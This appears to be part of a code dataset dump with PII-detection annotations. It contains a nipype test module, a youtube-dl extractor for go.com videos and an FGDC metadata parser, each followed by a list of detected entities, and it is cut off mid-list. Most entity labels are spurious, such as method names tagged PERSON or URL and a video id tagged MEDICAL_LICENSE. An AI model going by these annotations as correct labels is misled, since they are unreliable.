ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
os.chdir(pwd)
teardown_file(tmpd)
def test_global_CommandLine_output():
tmp_infile = setup_file()
tmpd, name = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, name in res.runtime.stdout
yield assert_true, os.path.exists(tmp_infile)
nib.CommandLine.set_default_terminal_output('allatonce')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_equal, res.runtime.merged, ''
yield assert_true, name in res.runtime.stdout
nib.CommandLine.set_default_terminal_output('file')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
nib.CommandLine.set_default_terminal_output('none')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_equal, res.runtime.stdout, ''
os.chdir(pwd)
teardown_file(tmpd)
def assert_not_raises(fn, *args, **kwargs):
fn(*args, **kwargs)
return True
def check_dict(ref_dict, tst_dict):
""""""Compare dictionaries of inputs and and those loaded from json files""""""
def to_list(x):
if isinstance(x, tuple):
x = list(x)
if isinstance(x, list):
for i, xel in enumerate(x):
x[i] = to_list(xel)
return x
failed_dict = {}
for key, value in list(ref_dict.items()):
newval = to_list(tst_dict[key])
if newval != value:
failed_dict[key] = (value, newval)
return failed_dict
",26974,"[['UK_NHS', '0000000000'], ['PERSON', 'ts=4 sw=4'], ['PERSON', 'simplejson'], ['PERSON', 'Bunch(b=2'], ['LOCATION', 'c=3'], ['LOCATION', 'b=2'], ['PERSON', 'json'], ['PERSON', 'json'], ['LOCATION', 'os.path.join(tmp_dir'], ['PERSON', 'teardown_file(tmp_dir'], ['NRP', 'shutil.rmtree(tmp_dir'], ['LOCATION', 'spec().goo'], ['PERSON', 'BaseTraitedSpec'], ['DATE_TIME', ""desc='bar""], ['LOCATION', 'myif.inputs.kung'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'my_%s_template'], ['PERSON', 'testobj'], ['LOCATION', 's_mootpl'], ['LOCATION', 'test_cycle_namesource2'], ['PERSON', '=tmp_infile'], ['PERSON', 'hashval1'], ['PERSON', 'nif'], ['LOCATION', 'nib.BaseInterface.help'], ['PERSON', 'tmp_json = os.path.join(tmp_dir'], ['PERSON', 'Int'], ['PERSON', 'Bool'], ['PERSON', 'input4 = nib.traits'], ['PERSON', 'input4'], ['PERSON', 'input4'], ['PERSON', 'setf'], ['LOCATION', 'tsthash.inputs.get_traitsfree'], ['LOCATION', 'tsthash2.inputs.get_traitsfree'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['NRP', ""desc='a""], ['LOCATION', ""desc='an""], ['PERSON', 'roo = nib.traits'], ['PERSON', ""ci6 = DerivedClass(command='cmd'""], ['LOCATION', 'test_CommandLine_output'], ['PERSON', 'fn(*args'], ['LOCATION', 'json'], ['PERSON', 'to_list(xel'], ['URL', 'library.in'], ['URL', 'nipype.interfaces.ba'], ['URL', 'nipype.utils.fi'], ['URL', 'nipype.interfaces.ba'], ['URL', 'traits.testing.no'], ['URL', 'b.ge'], ['URL', 'b.ge'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'nib.md'], ['URL', 'fp.re'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Tr'], ['URL', 'infields.ge'], ['URL', 'nib.Ba'], ['URL', 'a.ad'], ['URL', 'nib.traits.Int'], ['URL', 'a.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.in'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'w1.me'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'instance.fo'], ['URL', 'instance.ba'], ['URL', 'w1.me'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.in'], ['URL', 'testobj.cm'], ['URL', 'testobj.inputs.mo'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to0.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to1.in'], ['URL', 'to1.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.ch'], ['URL', 'nib.Interface.in'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nif.ru'], ['URL', 'nif.ag'], ['URL', 'nib.Ba'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', '.inputs.fo'], ['URL', 'nib.BaseInterface.in'], ['URL', 'nib.Ba'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.St'], ['URL', 'nib.Ba'], ['URL', 'bif.sa'], ['URL', 'bif2.inputs.ge'], ['URL', 'bif3.inputs.ge'], ['URL', 'dict.co'], ['URL', 'bif4.inputs.ge'], ['URL', 'bif5.inputs.ge'], ['URL', 'bif6.inputs.ge'], ['URL', 'nipype.interfaces.an'], ['URL', 'tsthash.inputs.ge'], ['URL', 'tsthash2.inputs.ge'], ['URL', 'tsthash.inputs.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.ru'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'ci.cm'], ['URL', 'ci.inputs.ar'], ['URL', 'nib.Com'], ['URL', 'ci2.cm'], ['URL', 'nib.Com'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'nib.Com'], ['URL', 'nib.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'ci4.inputs.fo'], ['URL', 'ci4.in'], ['URL', 'ci4.in'], ['URL', 'ci4.inputs.mo'], ['URL', 'ci4.inputs.no'], ['URL', 'ci4.inputs.ro'], ['URL', 'ci4.inputs.so'], ['URL', 'ci4.inputs.so'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'config.se'], ['URL', 'nib.Com'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'config.se'], ['URL', 'ci3.ru'], ['URL', 'ci3.in'], ['URL', 'res.ru'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.pa'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'dict.it']]"
53,"# coding: utf-8
from __future__ import unicode_literals
import re
from .adobepass import AdobePassIE
from ..utils import (
int_or_none,
determine_ext,
parse_age_limit,
urlencode_postdata,
ExtractorError,
)
class GoIE(AdobePassIE):
_SITE_INFO = {
'abc': {
'brand': '001',
'requestor_id': 'ABC',
},
'freeform': {
'brand': '002',
'requestor_id': 'ABCFamily',
},
'watchdisneychannel': {
'brand': '004',
'requestor_id': 'Disney',
},
'watchdisneyjunior': {
'brand': '008',
'requestor_id': 'DisneyJunior',
},
'watchdisneyxd': {
'brand': '009',
'requestor_id': 'DisneyXD',
}
}
_VALID_URL = r'https?://(?:(?P%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P\w+)|season-\d+/\d+-(?P[^/?#]+))' % '|'.join(_SITE_INFO.keys())
_TESTS = [{
'url': 'http://abc.go.PI:KEY',
'info_dict': {
'id': '0_g86w5onx',
'ext': 'mp4',
'title': 'Sneak Peek: Language Arts',
'description': 'PI:KEY',
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',
'only_matching': True,
}]
def _real_extract(self, url):
sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups()
if not video_id:
webpage = self._download_webpage(url, display_id)
video_id = self._search_regex(
# There may be inner quotes, e.g. data-video-id=""'VDKA3609139'""
# from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood
r'data-video-id=[""\']*VDKA(\w+)', webpage, 'video id')
site_info = self._SITE_INFO[sub_domain]
brand = site_info['brand']
video_data = self._download_json(
'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id),
video_id)['video'][0]
title = video_data['title']
formats = []
for asset in video_data.get('assets', {}).get('asset', []):
asset_url = asset.get('value')
if not asset_url:
continue
format_id = asset.get('format')
ext = determine_ext(asset_url)
if ext == 'm3u8':
video_type = video_data.get('type')
data = {
'video_id': video_data['id'],
'video_type': video_type,
'brand': brand,
'device': '001',
}
if video_data.get('accesslevel') == '1':
requestor_id = site_info['requestor_id']
resource = self._get_mvpd_resource(
requestor_id, title, video_id, None)
auth = self._extract_mvpd_auth(
url, video_id, requestor_id, resource)
data.update({
'token': auth,
'token_type': 'ap',
'adobe_requestor_id': requestor_id,
})
else:
self._initialize_geo_bypass(['US'])
entitlement = self._download_json(
'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',
video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers())
errors = entitlement.get('errors', {}).get('errors', [])
if errors:
for error in errors:
if error.get('code') == 1002:
self.raise_geo_restricted(
error['message'], countries=['US'])
error_message = ', '.join([error['message'] for error in errors])
raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True)
asset_url += '?' + entitlement['uplynkData']['sessionKey']
formats.extend(self._extract_m3u8_formats(
asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False))
else:
f = {
'format_id': format_id,
'url': asset_url,
'ext': ext,
}
if re.search(r'(?:/mp4/source/|_source\.mp4)', asset_url):
f.update({
'format_id': ('%s-' % format_id if format_id else '') + 'SOURCE',
'preference': 1,
})
else:
mobj = re.search(r'/(\d+)x(\d+)/', asset_url)
if mobj:
height = int(mobj.group(2))
f.update({
'format_id': ('%s-' % format_id if format_id else '') + '%dP' % height,
'width': int(mobj.group(1)),
'height': height,
})
formats.append(f)
self._sort_formats(formats)
subtitles = {}
for cc in video_data.get('closedcaption', {}).get('src', []):
cc_url = cc.get('value')
if not cc_url:
continue
ext = determine_ext(cc_url)
if ext == 'xml':
ext = 'ttml'
subtitles.setdefault(cc.get('lang'), []).append({
'url': cc_url,
'ext': ext,
})
thumbnails = []
for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []):
thumbnail_url = thumbnail.get('value')
if not thumbnail_url:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
return {
'id': video_id,
'title': title,
'description': video_data.get('longdescription') or video_data.get('description'),
'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000),
'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')),
'episode_number': int_or_none(video_data.get('episodenumber')),
'series': video_data.get('show', {}).get('title'),
'season_number': int_or_none(video_data.get('season', {}).get('num')),
'thumbnails': thumbnails,
'formats': formats,
'subtitles': subtitles,
}
",6904,"[['MEDICAL_LICENSE', 'ka3335601'], ['URL', ""http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',""], ['LOCATION', '.adobepass'], ['LOCATION', 'video_id, display_id ='], ['URL', 're.ma'], ['URL', 'asset.ge'], ['URL', 'self.ge'], ['URL', 're.se'], ['PERSON', ""mobj = re.search(r'/(\\d+)x(\\d+)/'""], ['URL', 'cc.ge'], ['URL', 'thumbnail.ge'], ['URL', 'thumbnail.ge'], ['PERSON', ""int_or_none(video_data.get('season""], ['URL', 'http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood'], ['URL', ""http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json'""], ['URL', ""https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',""], ['URL', 'INFO.ke'], ['URL', 'data.ge'], ['URL', 'asset.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'entitlement.ge'], ['URL', 'error.ge'], ['URL', 'self.IE'], ['URL', 're.se'], ['URL', 'mobj.gr'], ['URL', 'mobj.gr'], ['URL', 'data.ge'], ['URL', 'subtitles.se'], ['URL', 'cc.ge'], ['URL', 'data.ge'], ['URL', 'thumbnail.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge']]"
54,"# -*- coding: ISO-8859-15 -*-
# =============================================================================
# Copyright (c) 2010 Tom Kralidis
#
# Authors : Tom Kralidis dummy@email.com
#
# Contact email: dummy@email.com
# =============================================================================
"""""" FGDC metadata parser """"""
from __future__ import (absolute_import, division, print_function)
from owscapable.etree import etree
from owscapable import util
class Metadata(object):
"""""" Process metadata """"""
def __init__(self, md):
if hasattr(md, 'getroot'): # standalone document
self.xml = etree.tostring(md.getroot())
else: # part of a larger document
self.xml = etree.tostring(md)
self.idinfo = Idinfo(md)
self.eainfo = Eainfo(md)
self.distinfo = Distinfo(md)
self.metainfo = Metainfo(md)
if self.idinfo.datasetid:
self.identifier = self.idinfo.datasetid
class Idinfo(object):
"""""" Process idinfo """"""
def __init__(self, md):
val = md.find('idinfo/datasetid')
self.datasetid = util.testXMLValue(val)
val = md.find('idinfo/citation')
self.citation = Citation(val)
val = md.find('idinfo/descript')
if val is not None:
self.descript = Descript(val)
val = md.find('idinfo/timeperd')
self.timeperd = Timeperd(val)
val = md.find('idinfo/status')
if val is not None:
self.status = Status(val)
val = md.find('idinfo/spdom')
if val is not None:
self.spdom = Spdom(val)
val = md.find('idinfo/keywords')
if val is not None:
self.keywords = Keywords(val)
val = md.find('idinfo/accconst')
self.accconst = util.testXMLValue(val)
val = md.find('idinfo/useconst')
self.useconst = util.testXMLValue(val)
val = md.find('idinfo/ptcontac')
if val is not None:
self.ptcontac = Ptcontac(val)
val = md.find('idinfo/datacred')
self.datacred = util.testXMLValue(val)
val = md.find('idinfo/crossref')
self.crossref = Citation(val)
class Citation(object):
"""""" Process citation """"""
def __init__(self, md):
if md is not None:
self.citeinfo = {}
val = md.find('citeinfo/origin')
self.citeinfo['origin'] = util.testXMLValue(val)
val = md.find('citeinfo/pubdate')
self.citeinfo['pubdate'] = util.testXMLValue(val)
val = md.find('citeinfo/title')
self.citeinfo['title'] = util.testXMLValue(val)
val = md.find('citeinfo/geoform')
self.citeinfo['geoform'] = util.testXMLValue(val)
val = md.find('citeinfo/pubinfo/pubplace')
self.citeinfo['pubplace'] = util.testXMLValue(val)
val = md.find('citeinfo/pubinfo/publish')
self.citeinfo['publish'] = util.testXMLValue(val)
self.citeinfo['onlink'] = []
for link in md.findall('citeinfo/onlink'):
self.citeinfo['onlink'].append(util.testXMLValue(link))
class Descript(object):
"""""" Process descript """"""
def __init__(self, md):
val = md.find('abstract')
self.abstract = util.testXMLValue(val)
val = md.find('purpose')
self.purpose = util.testXMLValue(val)
val = md.find('supplinf')
self.supplinf = util.testXMLValue(val)
class Timeperd(object):
"""""" Process timeperd """"""
def __init__(self, md):
if md is not None:
val = md.find('current')
self.current = util.testXMLValue(val)
val = md.find('timeinfo')
if val is not None:
self.timeinfo = Timeinfo(val)
class Timeinfo(object):
"""""" Process timeinfo """"""
def __init__(self, md):
val = md.find('sngdate')
if val is not None:
self.sngdate = Sngdate(val)
val = md.find('rngdates')
if val is not None:
self.rngdates = Rngdates(val)
class Sngdate(object):
"""""" Process sngdate """"""
def __init__(self, md):
val = md.find('caldate')
self.caldate = util.testXMLValue(val)
val = md.find('time')
self.time = util.testXMLValue(val)
class Rngdates(object):
"""""" Process rngdates """"""
def __init__(self, md):
val = md.find('begdate')
self.begdate = util.testXMLValue(val)
val = md.find('begtime')
self.begtime = util.testXMLValue(val)
val = md.find('enddate')
self.enddate = util.testXMLValue(val)
val = md.find('endtime')
self.endtime = util.testXMLValue(val)
class Status(object):
"""""" Process status """"""
def __init__(self, md):
val = md.find('progress')
self.progress = util.testXMLValue(val)
val = md.find('update')
self.update = util.testXMLValue(val)
class Spdom(object):
"""""" Process spdom """"""
def __init__(self, md):
val = md.find('bounding/westbc')
self.westbc = util.testXMLValue(val)
val = md.find('bounding/eastbc')
self.eastbc = util.testXMLValue(val)
val = md.find('bounding/northbc')
self.northbc = util.testXMLValue(val)
val = md.find('bounding/southbc')
self.southbc = util.testXMLValue(val)
if (self.southbc is not None and self.northbc is not None and
self.eastbc is not None and self.westbc is not None):
self.bbox = Bbox(self)
class Bbox(object):
"""""" Generate bbox for spdom (convenience function) """"""
def __init__(self, spdom):
self.minx = spdom.westbc
self.miny = spdom.southbc
self.maxx = spdom.eastbc
self.maxy = spdom.northbc
class Keywords(object):
"""""" Process keywords """"""
def __init__(self, md):
self.theme = []
self.place = []
self.temporal = []
for i in md.findall('theme'):
theme = {}
val = i.find('themekt')
theme['themekt'] = util.testXMLValue(val)
theme['themekey'] = []
for j in i.findall('themekey'):
themekey = util.testXMLValue(j)
if themekey is not None:
theme['themekey'].append(themekey)
self.theme.append(theme)
for i in md.findall('place'):
theme = {}
place = {}
val = i.find('placekt')
theme['placekt'] = util.testXMLValue(val)
theme['placekey'] = []
for j in i.findall('placekey'):
theme['placekey'].append(util.testXMLValue(j))
self.place.append(place)
for i in md.findall('temporal'):
theme = {}
temporal = {}
val = i.find('tempkt')
theme['tempkt'] = util.testXMLValue(val)
theme['tempkey'] = []
for j in i.findall('tempkey'):
theme['tempkey'].append(util.testXMLValue(j))
self.temporal.append(temporal)
class Ptcontac(object):
"""""" Process ptcontac """"""
def __init__(self, md):
val = md.find('cntinfo/cntorgp/cntorg')
self.cntorg = util.testXMLValue(val)
val = md.find('cntinfo/cntorgp/cntper')
self.cntper = util.testXMLValue(val)
val = md.find('cntinfo/cntpos')
self.cntpos = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/addrtype')
self.addrtype = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/address')
self.address = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/city')
self.city = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/state')
self.state = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/postal')
self.postal = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/country')
self.country = util.testXMLValue(val)
val = md.find('cntinfo/cntvoice')
self.voice = util.testXMLValue(val)
val = md.find('cntinfo/cntemail')
self.email = util.testXMLValue(val)
class Eainfo(object):
"""""" Process eainfo """"""
def __init__(self, md):
val = md.find('eainfo/detailed/enttyp/enttypl')
self.enttypl = util.testXMLValue(val)
val = md.find('eainfo/detailed/enttyp/enttypd')
self.enttypd = util.testXMLValue(val)
val = md.find('eainfo/detailed/enttyp/enttypds')
self.enttypds = util.testXMLValue(val)
self.attr = []
for i in md.findall('eainfo/detailed/attr'):
attr = {}
val = i.find('attrlabl')
attr['attrlabl'] = util.testXMLValue(val)
val = i.find('attrdef')
attr['attrdef'] = util.testXMLValue(val)
val = i.find('attrdefs')
attr['attrdefs'] = util.testXMLValue(val)
val = i.find('attrdomv/udom')
attr['udom'] = util.testXMLValue(val)
self.attr.append(attr)
class Distinfo(object):
"""""" Process distinfo """"""
def __init__(self, md):
val = md.find('distinfo')
if val is not None:
val2 = val.find('stdorder')
if val2 is not None:
self.stdorder = {'digform': []}
for link in val2.findall('digform'):
digform = {}
digform['name'] = util.testXMLValue(link.find('digtinfo/formname'))
digform['url'] = util.testXMLValue(link.find('digtopt/onlinopt/computer/networka/networkr/'))
self.stdorder['digform'].append(digform)
class Metainfo(object):
"""""" Process metainfo """"""
def __init__(self, md):
val = md.find('metainfo/metd')
self.metd = util.testXMLValue(val)
val = md.find('metainfo/metrd')
self.metrd = util.testXMLValue(val)
val = md.find('metainfo/metc')
if val is not None:
self.metc = Ptcontac(val)
val = md.find('metainfo/metstdn')
self.metstdn = util.testXMLValue(val)
val = md.find('metainfo/metstdv')
self.metstdv = util.testXMLValue(val)
val = md.find('metainfo/metac')
self.metac = util.testXMLValue(val)
val = md.find('metainfo/metuc')
self.metuc = util.testXMLValue(val)
",10441,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Tom Kralidis'], ['PERSON', 'Tom Kralidis dummy@email.com'], ['PERSON', 'md):'], ['PERSON', 'md):\n val'], ['PERSON', 'self.timeperd = Timeperd(val'], ['PERSON', 'md):\n '], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n '], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('sngdate""], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('caldate""], ['PERSON', 'self.time = util.testXMLValue(val'], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('begdate""], ['PERSON', ""md.find('begtime""], ['PERSON', ""md.find('enddate""], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('update""], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'self.enttypd ='], ['PERSON', 'md):\n val'], ['URL', 'val2.fi'], ['URL', 'link.fi'], ['URL', 'link.fi'], ['PERSON', 'md):\n val'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'owscapable.et'], ['URL', 'etree.to'], ['URL', 'md.ge'], ['URL', 'etree.to'], ['URL', 'self.id'], ['URL', 'self.me'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.de'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ke'], ['URL', 'md.fi'], ['URL', 'self.ac'], ['URL', 'md.fi'], ['URL', 'self.us'], ['URL', 'md.fi'], ['URL', 'self.pt'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.cr'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.su'], ['URL', 'md.fi'], ['URL', 'self.cu'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.sn'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ca'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.pro'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.no'], ['URL', 'md.fi'], ['URL', 'self.so'], ['URL', 'self.so'], ['URL', 'self.no'], ['URL', 'self.bb'], ['URL', 'spdom.so'], ['URL', 'self.ma'], ['URL', 